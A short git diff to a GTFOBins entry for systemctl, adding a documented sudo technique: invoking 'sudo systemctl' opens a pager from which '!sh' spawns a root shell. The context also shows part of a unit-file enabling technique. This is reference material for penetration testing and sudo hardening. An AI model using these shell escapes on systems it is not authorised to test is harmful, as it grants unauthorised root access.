diff --git a/_gtfobins/systemctl.md b/_gtfobins/systemctl.md index 05d2964..597a30e 100644 --- a/_gtfobins/systemctl.md +++ b/_gtfobins/systemctl.md @@ -20,4 +20,8 @@ functions: WantedBy=multi-user.target' > $TF sudo systemctl link $TF sudo systemctl enable --now $TF + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + sudo systemctl + !sh ---